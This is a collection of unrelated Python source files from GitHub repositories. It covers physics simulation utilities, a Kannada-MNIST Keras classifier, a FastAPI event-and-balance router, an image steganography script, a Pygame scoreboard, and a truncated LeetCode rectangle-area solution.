m.start()-lineBegin+1\n col2 = m.end()-lineBegin+1\n \n out << Header(level=2) \\\n << FileLink(path=path, lineNo=lineCount, colNo1=col1, \\\n colNo2=col2, rowType=\"primary\") \\\n << \"%s (line %s)\" % (path, lineCount) \\\n << Close \\\n << Close \\\n << CodeBlock(\"log log-snippet\") << snippet << Close << Flush\n\n index += termsLen\n\n source.close()\n os.close(fd)\n\n return findCount\n \ndef countLines(source, endPos):\n lines = 0\n lineBegin = 0\n lineEnd = 0\n \n index = 0\n while index <= endPos:\n m = reNewLine.search(source, index)\n if not m:\n break\n else:\n index = m.end()\n lines += 1\n lineBegin = lineEnd\n lineEnd = index\n \n return lines, lineBegin, lineEnd\n \ndef isSearchable(path):\n name, ext = os.path.splitext(path)\n name = os.path.basename(name)\n return (not name == \"pch.h\") and not ext in [\".jpg\", \".jpeg\", \".png\", \".gif\", \".psd\", \".pyc\", \".jssc\"]\n ","repo_name":"joehewitt/devon","sub_path":"devon/search.py","file_name":"search.py","file_ext":"py","file_size_in_byte":4650,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"22"} +{"seq_id":"24346881143","text":"import numpy as np\nimport ROOT\nimport pyhepmc\nimport os\nfrom array import array\n\ndef get_model_setup(model,setup=None):\n\n masses = couplings = decays = None\n\n if model==\"DarkPhoton\":\n \n #pids=[[-11, 11],[-13,13],[999,999]]\n decays=[\"e_e\",\"mu_mu\",\"had\"]\n \n masses = [ \n 0.01 ,\n 0.0501,\n 0.1585,\n 0.3548,\n 0.6457,\n 0.7586,\n 0.8913,\n 1.2589,\n 2.8184\n ]\n couplings=np.logspace(-8,-3,20)\n \n \n masses=[0.1585]\n couplings=[1.2742749857031322e-06]\n\n \n \n elif model==\"DarkHiggs\":\n #decays=[\"e_e\",\"mu_mu\",\"pi_pi\",\"4pi\",\"K_K\",\"other\"]\n #decays=[\"e_e\",\"mu_mu\",\"pi_pi\",\"K_K\"]\n decays=[\"e_e\"]\n \n \n masses = [ \n 0.1 , \n 0.2239, \n 0.5012, \n 0.6918, \n 0.8128, \n 0.955 ,\n 1.5849, \n 3.5 ,\n 11.22 , \n 25.119\n ]\n\n couplings=np.logspace(-6,-3,20)\n \n #masses = [0.6918]\n #couplings = [0.001]\n \n # Use full mass-coupling fidelity (same as original FORESEE reach plots)\n if setup and setup == \"full\":\n masses = [\n 0.1 , 0.1122, 0.1259, 0.1413, 0.1585, 0.1778, 0.1995, \n 0.2239, 0.2512, 0.2818, 0.3162, 0.3548, 0.3981, 0.4467, \n 0.5012, 0.5623, 0.6026, 0.631 , 0.6457, 0.6607, 0.6761, \n 0.6918, 0.7079, 0.7244, 0.7413, 0.7586, 0.7762, 0.7943, \n 0.8128, 0.8318, 0.8511, 0.871 , 0.8913, 0.912 , 0.9333, \n 
0.955 , 0.9772, 1. , 1.122 , 1.2589, 1.4125, 1.5 ,\n 1.5849, 1.7783, 1.9953, 2.2387, 2.5119, 2.8184, 3.1623, \n 3.5 , 3.7 , 3.9811, 5.0119, 6.3096, 7.9433, 10. ,\n 11.22 , 12.589, 14.125, 15.849, 17.783, 19.953, 22.387, \n 25.119, 28.184, 31.623, 39.811, 50.119, 55.000, 60.000,\n 63.096, 79.430, 99.9\n ]\n couplings=np.logspace(-8,-3,20)\n\n else:\n print(f\"ERROR: Couldn't find setup for model {model}\")\n\n return masses,couplings,decays\n\n\n\ndef clear_csvs(runmode,setup,currdir,outdir,energy):\n if runmode==\"eff\":\n if \"G4\" not in setup:\n return\n for G4setup in setup[\"G4\"]:\n for station in setup[\"stations\"]:\n for eff in setup[\"effs\"]:\n effname=f\"{currdir}/{outdir}/eff_{energy}TeV_{G4setup}_station{station}_{eff}.csv\"\n print(f\"Clearing eff file {effname}\")\n efffile = open(effname,'w')\n efffile.close()\n\n\ndef get_effs(hepname,sumall,sumeffs,outroot,decay,station,effs):\n \n # get xs from hepmc\n if not os.path.exists(hepname):\n print(f\"HepMC file {hepname} not found - skipping\")\n return sumall,sumeffs\n \n xs=0.\n print(\"JOSH2\",hepname)\n with pyhepmc.open(hepname) as f:\n print(\"JOSH3\")\n event = f.read()\n print(\"JOSH4\")\n xs=event.cross_section.xsec()\n print(\"Found cross section:\",xs)\n print(\"JOSH5\")\n if not os.path.exists(outroot):\n print(f\"ROOT file {outroot} not found - skipping\")\n return sumall,sumeffs\n\n print(f\"Working on ROOT file {outroot}\")\n \n try:\n f_eff=ROOT.TFile.Open(outroot,\"READ\")\n except:\n print(f\"ERROR: ROOT file {outroot} not opened properly\")\n return sumall,sumeffs\n \n t_eff = f_eff.Get(f\"Hits{station}\")\n if not t_eff:\n print(f\"ERROR: TTree Hits{station} not opened properly\")\n return sumall,sumeffs\n\n \n varp=''\n varm=''\n if decay==\"e_e\":\n varp='ep'\n varm='em'\n elif decay==\"mu_mu\":\n varp='mp'\n varm='mm'\n else:\n varp='hp'\n varm='hm'\n \n # Just use this to make a histogram, doesn't really matter what the variable is\n vary=varp+'_y' \n print(f\"Using var {vary}\")\n \n # Get total number of events\n hall=ROOT.TH1F(\"hall\",\"hall\",1000,0,10000) \n t_eff.Draw(f\"{vary}>>hall\");\n # Normalise to cross section\n sumall+=hall.Integral()*xs\n print(f\"decay = {decay}, all =\",hall.Integral(),xs,hall.Integral()*xs)\n \n # Get number of events passing each efficiency cut\n for n,(effval,efftitle,effstring) in enumerate(effs):\n # Correct eff string to be for relevant object in root file\n effstring=effstring.replace('ep',varp).replace('em',varm)\n heff=ROOT.TH1F(\"heff\",\"heff\",1000,0,10000)\n t_eff.Draw(f\"{vary}>>heff\",effstring)\n \n print(f\"decay = {decay},\",effstring,\",\",effs[n],\"=\",heff.Integral(),xs,heff.Integral()*xs)\n sumeffs[n]+=heff.Integral()*xs\n\n f_eff.Close()\n \n return sumall,sumeffs\n\n\ndef plot_seps(currdir,outdir,energy,mass,coup,decay,G4setup,setup_name):\n infile=f\"{currdir}/{outdir}/events_{energy}TeV_m{mass}GeV_c{coup}_to_{decay}_s1_{G4setup}.root\"\n if not os.path.exists(infile):\n print(f\"ROOT file {infile} not found - skipping\")\n return\n \n \n ROOT.gStyle.SetOptStat(0)\n ROOT.gStyle.SetOptTitle(0)\n \n f_L1 = ROOT.TFile.Open(infile)\n t_L1 = f_L1.Get(\"Hits1\")\n \n f_L2 = ROOT.TFile.Open(infile)\n t_L2 = f_L2.Get(\"Hits2\")\n \n f_L3 = ROOT.TFile.Open(infile)\n t_L3 = f_L3.Get(\"Hits3\")\n \n nbins = 50\n xmin = 1e-3\n xmax = 1e5\n logxmin = ROOT.TMath.Log10(xmin)\n logxmax = ROOT.TMath.Log10(xmax)\n binwidth = (logxmax-logxmin)/nbins\n xbins = [xmin]\n for i in range(1,nbins+1) :\n xbins.append(float(xmin + 
ROOT.TMath.Power(10,logxmin+i*binwidth)))\n \n \n c1 = ROOT.TCanvas(\"c1\",\"c1\")\n \n #print(xmin,array('d',xbins))\n \n h_dy_L1 = ROOT.TH1D(\"h_dy_L1\",\"h_dy_L1\",nbins,array('d',xbins))\n print(t_L1,h_dy_L1)\n t_L1.Draw(\"abs(ep_y-em_y)>>h_dy_L1\")\n print(h_dy_L1)\n \n h_dy_L2 = ROOT.TH1D(\"h_dy_L2\",\"h_dy_L2\",nbins,array('d',xbins))\n t_L2.Draw(\"abs(ep_x-em_x)>>h_dy_L2\")\n \n h_dy_L3 = ROOT.TH1D(\"h_dy_L3\",\"h_dy_L3\",nbins,array('d',xbins))\n t_L3.Draw(\"abs(ep_x-em_x)>>h_dy_L3\")\n \n if h_dy_L1.Integral(): h_dy_L1.Scale(1./h_dy_L1.Integral())\n if h_dy_L2.Integral(): h_dy_L2.Scale(1./h_dy_L2.Integral())\n if h_dy_L3.Integral(): h_dy_L3.Scale(1./h_dy_L3.Integral())\n\n \n h_dy_L1.SetMaximum(1.1*ROOT.TMath.Max(h_dy_L1.GetMaximum(),h_dy_L3.GetMaximum()))\n h_dy_L1.GetXaxis().SetTitle(\"Separation [mm]\")\n h_dy_L1.GetXaxis().SetTitleSize(0.045)\n \n h_dy_L1.SetLineColor(ROOT.kBlue+1)\n h_dy_L1.SetLineWidth(3)\n h_dy_L1.Draw(\"hist\")\n \n h_dy_L2.SetLineStyle(ROOT.kDashed)\n h_dy_L2.SetLineColor(ROOT.kBlue+1)\n h_dy_L2.SetLineWidth(3)\n h_dy_L2.Draw(\"histsame\")\n\n h_dy_L3.SetLineStyle(ROOT.kDotted)\n h_dy_L3.SetLineColor(ROOT.kBlue+1)\n h_dy_L3.SetLineWidth(3)\n h_dy_L3.Draw(\"histsame\")\n\n \n c1.SetLogx()\n c1.SetTickx()\n c1.SetTicky()\n \n leg = ROOT.TLegend(0.7,0.85,0.85,0.6)\n leg.SetBorderSize(0)\n leg.SetFillColor(0)\n leg.SetTextSize(0.04)\n leg.AddEntry(h_dy_L1,\"Station 1\",\"l\")\n leg.AddEntry(h_dy_L2,\"Station 2\",\"l\")\n leg.AddEntry(h_dy_L3,\"Station 3\",\"l\")\n \n leg.Draw()\n \n latex = ROOT.TLatex()\n latex.SetNDC()\n latex.SetTextFont(42)\n latex.SetTextSize(0.06)\n latex.DrawLatex(0.15,0.8,\"#bf{#it{FASER2}}\")\n latex.SetTextSize(0.05)\n latex.DrawLatex(0.32,0.8,setup_name)\n latex.SetTextSize(0.04)\n\n latex2 = ROOT.TLatex()\n latex2.SetNDC()\n latex2.SetTextFont(42)\n latex2.SetTextSize(0.04)\n latex2.DrawLatex(0.15,0.75,f\"m={mass} GeV\")\n latex2.DrawLatex(0.15,0.7,f\"#varepsilon={coup:.5g}\")\n latex2.SetTextSize(0.04)\n\n c1.SaveAs(f\"{currdir}/{outdir}/plot_sep_stations_{energy}TeV_m{mass}GeV_c{coup}_to_{decay}_s1_{G4setup}.pdf\")\n","repo_name":"joshmcfayden/FASER2_GenSim","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":8220,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"69947780538","text":"# This Python 3 environment comes with many helpful analytics libraries installed\n\n# It is defined by the kaggle/python docker image: https://github.com/kaggle/docker-python\n\n# For example, here's several helpful packages to load in \n\n\n\nimport numpy as np # linear algebra\n\nimport pandas as pd # data processing, CSV file I/O (e.g. 
pd.read_csv)\n\n\n\n# Input data files are available in the \"../input/\" directory.\n\n# For example, running this (by clicking run or pressing Shift+Enter) will list all files under the input directory\n\n\n\nimport os\n\nfor dirname, _, filenames in os.walk('/kaggle/input'):\n\n for filename in filenames:\n\n print(os.path.join(dirname, filename))\n\n\n\n# Any results you write to the current directory are saved as output.\ntrain = '/kaggle/input/Kannada-MNIST/train.csv'\n\ntest = '/kaggle/input/Kannada-MNIST/test.csv'\n\n\n\ndataset = pd.read_csv(train)\n\ndataset_test = pd.read_csv(test)\n\ndataset_test = dataset_test.drop(['id'], axis = 1)\n\n\n\nfeatures = dataset.drop(['label'], axis = 1)\n\nlabels = dataset['label']\n\ndataset_test.head()\nfeatures = features.values\n\nfeatures_test = dataset_test.values\n\nprint(features.shape)\n\nprint(features_test.shape)\n\n\n\nfeatures = features.reshape((features.shape[0], 28, 28))\n\nfeatures_test = features_test.reshape((features_test.shape[0], 28, 28))\n\n\n\nprint(features.shape)\n\nprint(features_test.shape)\nfrom keras.utils import np_utils\n\n\n\nseed = 300\n\ntest_size = 0.2\n\n\n\n# Import train_test_split\n\nfrom sklearn.model_selection import train_test_split\n\n# Split the 'features' and 'labels' data into training and testing sets\n\nX_train, X_test, y_train, y_test = train_test_split(features, labels, test_size = test_size, random_state = seed, stratify=labels)\n\n#X_test, X_valid, y_train, y_valid = train_test_split(X_test, y_test, test_size = 0.1, random_state = seed)\n\n\n\nX_train = np.repeat(X_train[..., np.newaxis], 1, -1)\n\nX_test = np.repeat(X_test[..., np.newaxis], 1, -1)\n\nfeatures_test = np.repeat(features_test[..., np.newaxis], 1, -1)\n\n\n\ny_train = np_utils.to_categorical(np.array(y_train), 10)\n\ny_test = np_utils.to_categorical(np.array(y_test), 10)\n\n\n\nprint(\"features set has {} samples.\".format(features.shape))\n\nprint(\"Training set has {} samples.\".format(X_train.shape))\n\nprint(\"Testing set has {} samples.\".format(X_test.shape))\n\n#print(\"Valid set has {} samples.\".format(X_valid.shape[0]\n\n\nfrom keras.layers import Conv2D, MaxPooling2D, GlobalAveragePooling2D\n\nfrom keras.layers import Dropout, Flatten, Dense, BatchNormalization\n\nfrom keras.models import Sequential\n\n\n\nmodel = Sequential()\n\n\n\nmodel.add(Conv2D(filters=16, kernel_size=5, padding='same', activation='relu', input_shape=(28, 28, 1)))\n\nmodel.add(Conv2D(filters=16, kernel_size=5, padding='same', activation='relu'))\n\nmodel.add(BatchNormalization())\n\nmodel.add(MaxPooling2D(pool_size=2))\n\nmodel.add(Dropout(0.4))\n\n\n\nmodel.add(Conv2D(filters=32, kernel_size=5, padding='same', activation='relu'))\n\nmodel.add(Conv2D(filters=32, kernel_size=5, padding='same', activation='relu'))\n\nmodel.add(BatchNormalization())\n\nmodel.add(MaxPooling2D(pool_size=2))\n\nmodel.add(Dropout(0.4))\n\n\n\nmodel.add(Conv2D(filters=64, kernel_size=5, padding='same', activation='relu'))\n\nmodel.add(Conv2D(filters=64, kernel_size=5, padding='same', activation='relu'))\n\nmodel.add(BatchNormalization())\n\nmodel.add(MaxPooling2D(pool_size=2))\n\nmodel.add(Dropout(0.4))\n\n\n\nmodel.add(Flatten())\n\nmodel.add(Dense(512, activation='relu'))\n\nmodel.add(Dropout(0.5))\n\nmodel.add(Dense(1024, activation='relu'))\n\nmodel.add(Dropout(0.5))\n\nmodel.add(Dense(10, activation='softmax'))\n\n\n\nmodel.compile(optimizer='adam', loss='categorical_crossentropy', metrics=['accuracy'])\nfrom keras.callbacks import ModelCheckpoint 
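# --- editor's note: illustrative sketch, not part of the original notebook record ---
# The next cell wires a ModelCheckpoint callback into model.fit(). A minimal
# version of that pattern (assuming `model` is the compiled Sequential net and
# WEIGHTS_FILE the path defined below) would be:
#
#   checkpointer = ModelCheckpoint(filepath=WEIGHTS_FILE, verbose=1, save_best_only=True)
#   model.fit(X_train, y_train, validation_data=(X_test, y_test), callbacks=[checkpointer])
#   model.load_weights(WEIGHTS_FILE)  # restore the best-scoring epoch before predicting
#
# Note that the original passes filepath='WEIGHTS_FILE' (a string literal), so the
# checkpoint lands in a file literally named WEIGHTS_FILE rather than weights.base.hdf5.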
\n\n\n\nmodel.compile(optimizer='adam', loss='categorical_crossentropy', metrics=['accuracy'])\n\n\n\nWEIGHTS_FILE = 'weights.base.hdf5'\n\n### TODO: specify the number of epochs that you would like to use to train the model.\n\n\n\nepochs = 100\n\n\n\n### Do NOT modify the code below this line.\n\n\n\ncheckpointer = ModelCheckpoint(filepath='WEIGHTS_FILE', \n\n verbose=1, save_best_only=True)\n\n\n\nhistory = model.fit(X_train, \n\n y_train, \n\n validation_data=(X_test, y_test),\n\n epochs=epochs, \n\n batch_size=200, \n\n callbacks=[checkpointer], \n\n verbose=1)\nimport matplotlib.pyplot as plt\n\nimport numpy\n\n\n\ndef plot_history(history):\n\n # summarize history for accuracy\n\n plt.plot(history.history['accuracy'])\n\n plt.plot(history.history['val_accuracy'])\n\n plt.title('model accuracy')\n\n plt.ylabel('accuracy')\n\n plt.xlabel('epoch')\n\n plt.legend(['train', 'test'], loc='upper left')\n\n plt.show()\n\n # summarize history for loss\n\n plt.plot(history.history['loss'])\n\n plt.plot(history.history['val_loss'])\n\n plt.title('model loss')\n\n plt.ylabel('loss')\n\n plt.xlabel('epoch')\n\n plt.legend(['train', 'test'], loc='upper left')\n\n plt.show()\nplot_history(history)\nprint(features_test.shape)\n\n# get index of predicted dog breed for each image in test set\n\npredictions = [np.argmax(model.predict(np.expand_dims(tensor, axis=0))) for tensor in features_test]\n\n\n\nprint(np.array(predictions))\nprint(np.array(predictions))\n\npredictions_df = pd.DataFrame(np.array(predictions), columns = ['Label'])\n\npredictions_df.reset_index(level=0, inplace=True)\n\npredictions_df.columns = ['id', 'label']\n\npredictions_df.index += 1 \n\npredictions_df.to_csv('predictions.csv', index = False)\n\npredictions_df.head()","repo_name":"aorursy/new-nb-5","sub_path":"mrugeles_kannada-mnist.py","file_name":"mrugeles_kannada-mnist.py","file_ext":"py","file_size_in_byte":5536,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"73427564215","text":"\"\"\"FastAPI blueprint, that contains events manipulation methods.\"\"\"\n\nimport datetime as dt\n\nfrom fastapi import APIRouter, Depends\nfrom pydantic import BaseModel\nfrom sqlalchemy import desc, select\nfrom sqlalchemy.ext.asyncio import AsyncSession\nfrom sqlalchemy.orm import sessionmaker\n\nfrom .utils.exceptions import LogicException\nfrom .utils.models import (\n UserModel,\n EventModel,\n SavePointModel,\n create_account_entry,\n)\nfrom .user import authorized_user\nfrom .utils.database import get_session\n\n\nrouter = APIRouter()\n\n\nasync def _update_or_create_savepoint(\n session: AsyncSession, user_id, account_id, event_time: dt.datetime\n):\n # event in the start of the month is not accounted for\n # in the savepoint at a same time, it would be in a next savepoint\n month_start = event_time.replace(\n day=1, hour=0, minute=0, second=0, microsecond=0\n )\n query = (\n await session.execute(\n select(SavePointModel)\n .where(SavePointModel.user_id == user_id)\n .where(SavePointModel.account_id == account_id)\n .where(SavePointModel.datetime < event_time)\n .order_by(desc(SavePointModel.datetime))\n )\n ).first()\n\n if not query: # earliest savepoint\n savepoint = await create_account_entry(\n session,\n SavePointModel,\n user_id=user_id,\n account_id=account_id,\n datetime=month_start,\n total=0,\n )\n session.add(savepoint)\n elif query[0].datetime < month_start: # new savepoint\n query = await session.execute(\n select(EventModel.diff)\n .where(EventModel.user_id 
== user_id)\n .where(EventModel.account_id == account_id)\n .where(EventModel.event_time >= savepoint.datetime)\n .where(EventModel.event_time < month_start)\n )\n\n savepoint = await create_account_entry(\n session,\n SavePointModel,\n user_id=user_id,\n account_id=account_id,\n datetime=month_start,\n total=savepoint.total + sum(diff for (diff,) in query.all()),\n )\n session.add(savepoint)\n\n\nasync def _update_latter_savepoints(\n session: AsyncSession, user_id, account_id, event_time: dt.datetime, diff\n):\n savepoints = (\n await session.execute(\n select(SavePointModel)\n .where(SavePointModel.user_id == user_id)\n .where(SavePointModel.account_id == account_id)\n .where(SavePointModel.datetime >= event_time)\n )\n ).all()\n for (savepoint,) in savepoints:\n savepoint.total += diff\n\n\nclass EventData(BaseModel):\n account_id: int\n category_id: int\n event_time: int\n diff: int\n description: str\n\n\n@router.post(\"/create_event\")\nasync def create_event(\n event_data: EventData,\n current_user: UserModel = Depends(authorized_user),\n async_session: sessionmaker = Depends(get_session),\n):\n \"\"\"Request to create new event.\"\"\"\n event_time = dt.datetime.fromtimestamp(event_data.event_time)\n session: AsyncSession\n async with async_session() as session:\n event: EventModel = await create_account_entry(\n session,\n EventModel,\n user_id=current_user.id,\n account_id=event_data.account_id,\n category_id=event_data.category_id,\n event_time=event_time,\n diff=event_data.diff,\n description=event_data.description,\n )\n session.add(event)\n await _update_or_create_savepoint(\n session, current_user.id, event_data.account_id, event_time\n )\n await _update_latter_savepoints(\n session,\n current_user.id,\n event_data.account_id,\n event_time,\n event_data.diff,\n )\n await session.commit()\n return {\"status\": \"OK\", \"event\": event.to_dict()}\n\n\nclass GetEventsRequest(BaseModel):\n account_id: int\n start_time: int | None = None\n end_time: int | None = None\n\n\n@router.post(\"/get_events\")\nasync def get_events(\n request: GetEventsRequest,\n current_user: UserModel = Depends(authorized_user),\n async_session: sessionmaker = Depends(get_session),\n):\n \"\"\"Get all events user has.\"\"\"\n query = (\n select(EventModel)\n .where(EventModel.user_id == current_user.id)\n .where(EventModel.account_id == request.account_id)\n )\n if request.start_time:\n query = query.where(\n EventModel.event_time\n > dt.datetime.fromtimestamp(request.start_time)\n )\n if request.end_time:\n query = query.where(\n EventModel.event_time < dt.datetime.fromtimestamp(request.end_time)\n )\n session: AsyncSession\n async with async_session() as session:\n events = await session.execute(query)\n return {\n \"status\": \"OK\",\n \"events\": [event.to_dict() for (event,) in events.all()],\n }\n\n\nclass EditEventRequest(BaseModel):\n event_id: int\n account_id: int\n category_id: int\n event_time: int\n diff: int\n description: str\n\n\n@router.post(\"/edit_event\")\nasync def edit_event(\n request: EditEventRequest,\n current_user: UserModel = Depends(authorized_user),\n async_session: sessionmaker = Depends(get_session),\n):\n \"\"\"Request to edit event.\"\"\"\n session: AsyncSession\n async with async_session() as session:\n event: EventModel = await session.get(\n EventModel,\n (current_user.id, request.account_id, request.event_id),\n )\n if event is None:\n raise LogicException(\"no such event\")\n\n event_time = dt.datetime.fromtimestamp(request.event_time)\n old_event_time: dt.datetime 
= event.event_time\n old_diff = event.diff\n\n event.category_id = request.category_id\n event.event_time = event_time\n event.diff = request.diff\n event.description = request.description\n\n if old_event_time != event_time:\n await _update_latter_savepoints(\n session,\n current_user.id,\n event.account_id,\n old_event_time,\n -request.diff,\n )\n await _update_or_create_savepoint(\n session, current_user.id, event.account_id, event_time\n )\n await _update_latter_savepoints(\n session,\n current_user.id,\n event.account_id,\n event_time,\n request.diff,\n )\n elif old_diff != request.diff:\n await _update_latter_savepoints(\n session,\n current_user.id,\n event.account_id,\n event_time,\n request.diff - old_diff,\n )\n await session.commit()\n\n return {\"status\": \"OK\", \"event\": event.to_dict()}\n\n\nclass DeleteEventRequest(BaseModel):\n account_id: int\n event_id: int\n\n\n@router.post(\"/delete_event\")\nasync def delete_event(\n request: DeleteEventRequest,\n current_user: UserModel = Depends(authorized_user),\n async_session: sessionmaker = Depends(get_session),\n):\n \"\"\"Delete existing event.\"\"\"\n session: AsyncSession\n async with async_session() as session:\n async with session.begin():\n event: EventModel = await session.get(\n EventModel,\n (current_user.id, request.account_id, request.event_id),\n )\n if event is None:\n raise LogicException(\"no such event\")\n\n await session.delete(event)\n # TODO remove savepoint if event is a last one\n await _update_latter_savepoints(\n session,\n current_user.id,\n event.account_id,\n event.event_time,\n -event.diff,\n )\n\n return {\"status\": \"OK\", \"event\": event.to_dict()}\n\n\nclass GetBalanceRequest(BaseModel):\n account_id: int\n timestamp: int\n\n\n@router.post(\"/get_balance\")\nasync def get_balance(\n request: GetBalanceRequest,\n current_user: UserModel = Depends(authorized_user),\n async_session: sessionmaker = Depends(get_session),\n):\n \"\"\"Get balance on certain account at certain time.\"\"\"\n timepoint = dt.datetime.fromtimestamp(request.timestamp)\n\n session: AsyncSession\n async with async_session() as session:\n query = (\n await session.execute(\n select(SavePointModel)\n .where(SavePointModel.user_id == current_user.id)\n .where(SavePointModel.account_id == request.account_id)\n .where(SavePointModel.datetime <= timepoint)\n .order_by(desc(SavePointModel.datetime))\n )\n ).first()\n\n print(\"!\", query)\n\n if not query:\n return {\"status\": \"OK\", \"balance\": 0}\n\n (savepoint,) = query\n query = await session.execute(\n select(EventModel.diff)\n .where(EventModel.user_id == current_user.id)\n .where(EventModel.account_id == request.account_id)\n .where(EventModel.event_time >= savepoint.datetime)\n .where(EventModel.event_time < timepoint)\n )\n return {\n \"status\": \"OK\",\n \"balance\": savepoint.total + sum(diff for (diff,) in query.all()),\n }\n\n\nasync def get_category_total(\n session: AsyncSession, account_id, category_id, start_time, end_time\n):\n \"\"\"\n Get total income for given time in given category.\n\n start_time and end_time are both datetime.\n \"\"\"\n query = await session.execute(\n select(EventModel.diff)\n .where(EventModel.account_id == account_id)\n .where(EventModel.category_id == category_id)\n .where(EventModel.event_time >= start_time)\n .where(EventModel.event_time < end_time)\n )\n return sum(diff for (diff,) in 
query.all())\n","repo_name":"GreenBlackSky/COIN","sub_path":"api_service/app/event.py","file_name":"event.py","file_ext":"py","file_size_in_byte":9955,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"71867376055","text":"from bitstring import Bits\nfrom PIL import Image\nimport argparse\n\nargument_parser = argparse.ArgumentParser(\n description=\"This tool allows you to read hidden messages from images. Use the -m argument to hide the message\"\n \" into the image instead.\")\nargument_parser.add_argument(\"filename\", help=\"filename of the image you want to process\", type=str)\nargument_parser.add_argument(\"-m\", \"--message\", help=\"the message you want to hide into the image\", type=str)\n\nargs = argument_parser.parse_args()\n\nimage = Image.open(args.filename)\nwidth, height = image.size\n\n# hide message\nif args.message is not None:\n message_bytes = bytes(args.message, encoding='utf-8')\n\n byte_capacity = width * height * 3 // 8 # how many bytes can be hidden into the image\n if byte_capacity < len(message_bytes):\n print(\"The message is too long to fit into the image.\")\n exit(1)\n\n # convert the message bytes into a string of ones and zeros\n bits = \"\"\n for byte in message_bytes:\n bits += Bits(int=byte, length=9)[1:].bin\n\n # end sequence - byte of ones is invalid utf-8 byte\n # the zero in the beginning is there to prevent the end sequence merging with the previous byte that might be ending\n # with a one\n bits += \"011111111\"\n\n # a little performance optimization - no need to iterate over the image pixels after the message was hidden\n finished_writing = False\n\n writing_bit_index = 0\n for x in range(0, width):\n for y in range(0, height):\n pixel_to_update = list(image.getpixel((x, y))) # iterating over pixels in the image\n for rgb in range(0, 3): # pixel is represented as [int(red),int(green),int(blue)] - iterate over the colors\n if writing_bit_index < len(bits): # performance optimization\n # change the last bit of the color to the bit at writing_bit_index\n pixel_to_update[rgb] = pixel_to_update[rgb] & ~1 | int(bits[writing_bit_index])\n\n writing_bit_index += 1\n else:\n finished_writing = True\n break\n image.putpixel((x, y), tuple(pixel_to_update)) # save the change to the pixel\n if finished_writing:\n break\n if finished_writing:\n break\n\n image.save(args.filename, \"PNG\") # save the image\n\n# show message\nelse:\n bits = \"\"\n for x in range(0, width):\n for y in range(0, height):\n pixel = list(image.getpixel((x, y))) # iterating over the pixels in the image\n for rgb in range(0, 3):\n bits += str(pixel[rgb] & 1) # read the last bit of the colors\n\n # find the end sequence and remove the zero that prevented merging with the previous byte\n bits = bits.split(\"11111111\", 1)[0][:-1]\n\n # convert the string of ones and zeros to bytes\n decode_byte_array = int(bits, 2).to_bytes((len(bits) + 7) // 8, byteorder='big')\n\n print(decode_byte_array.decode(\"utf-8\")) # convert the bytes to string\n","repo_name":"kokolem/pysteganography","sub_path":"steganography.py","file_name":"steganography.py","file_ext":"py","file_size_in_byte":3039,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"86763166772","text":"import pygame\n\nclass ScoreBoard:\n \"\"\"Background for ScoreBoard screen.\"\"\"\n\n def __init__(self, MainInstance):\n \"\"\"Basic values and image loading.\"\"\"\n\n # References\n self.screen = MainInstance.screen\n 
self.settings = MainInstance.settings\n\n # Load the images\n self.zero = pygame.image.load('Images/Numbers/0.png').convert_alpha()\n self.one = pygame.image.load('Images/Numbers/1.png').convert_alpha()\n self.two = pygame.image.load('Images/Numbers/2.png').convert_alpha()\n self.three = pygame.image.load('Images/Numbers/3.png').convert_alpha()\n self.four = pygame.image.load('Images/Numbers/4.png').convert_alpha()\n self.five = pygame.image.load('Images/Numbers/5.png').convert_alpha()\n self.six = pygame.image.load('Images/Numbers/6.png').convert_alpha()\n self.seven = pygame.image.load('Images/Numbers/7.png').convert_alpha()\n self.eight = pygame.image.load('Images/Numbers/8.png').convert_alpha()\n self.nine = pygame.image.load('Images/Numbers/9.png').convert_alpha()\n\n # Values dict\n self.score_dict = {0: self.zero, 1: self.one, 2: self.two, 3: self.three, 4: self.four,\n 5: self.five, 6: self.six, 7: self.seven, 8: self.eight, 9: self.nine}\n self.basic_rect = self.zero.get_rect()\n self.screen_center = self.screen.get_rect().center\n\n # Basic call for default score of 0\n self._determine_score(self.settings.dynamic_score)\n\n\n def _determine_score(self, score):\n # Function to determine the score\n\n # Create a surface\n self.surface = pygame.Surface(((self.basic_rect.width + 5) * len(str(score)), \\\n self.basic_rect.height), pygame.SRCALPHA)\n self.surface_rect = self.surface.get_rect()\n\n # Blit each score number onto surface\n for number, score_val in enumerate(str(score)):\n value = self.score_dict[int(score_val)]\n self.basic_rect.x = ((self.basic_rect.width + 5) * number)\n self.surface.blit(value, self.basic_rect)\n\n # Determine rect of surface\n self.surface_rect.center = self.screen_center\n self.surface_rect.y = self.settings.scoreboard_gap\n\n\n def draw_score(self):\n # Draw the actual scoreboard to game screen\n self._determine_score(self.settings.dynamic_score)\n self.screen.blit(self.surface, self.surface_rect)\n","repo_name":"testing99990011/Flappy_bird_game","sub_path":"Python Files/Flappy_Scoreboard.py","file_name":"Flappy_Scoreboard.py","file_ext":"py","file_size_in_byte":2438,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"28271620729","text":"\n\"\"\"\n\nFind the total area covered by two rectilinear rectangles in a 2D plane.\n\nEach rectangle is defined by its bottom left corner and top right corner as shown in the figure.\n\nRectangle Area\nAssume that the total area is never beyond the maximum possible value of int.\n\n\"\"\"\n\n### beat 88%\nclass Solution(object):\n def computeArea(self, A, B, C, D, E, F, G, H):\n \"\"\"\n :type A: int\n :type B: int\n :type C: int\n :type D: int\n :type E: int\n :type F: int\n :type G: int\n :type H: int\n :rtype: int\n \"\"\"\n area1 = (C-A)*(D-B)\n area2 = (H-F)*(G-E)\n side1 = self.computeSide(A, C, E, G)\n side2 = self.computeSide(B, D, F, H)\n return area1+area2-side1*side2\n \n def computeSide(self,a,b,c,d):\n if d < a or c > b:\n return 0\n elif c > a and d <= b:\n return d-c\n elif c <= a and d <= b:\n return d-a\n elif c <= a and d > b:\n return b-a \n else:\n return b-c\n \n\nclass Solution(object):\n def computeArea(self, A, B, C, D, E, F, G, H):\n \"\"\"\n :type A: int\n :type B: int\n :type C: int\n :type D: int\n :type E: int\n :type F: int\n :type G: int\n :type H: int\n :rtype: int\n \"\"\"\n area1 = 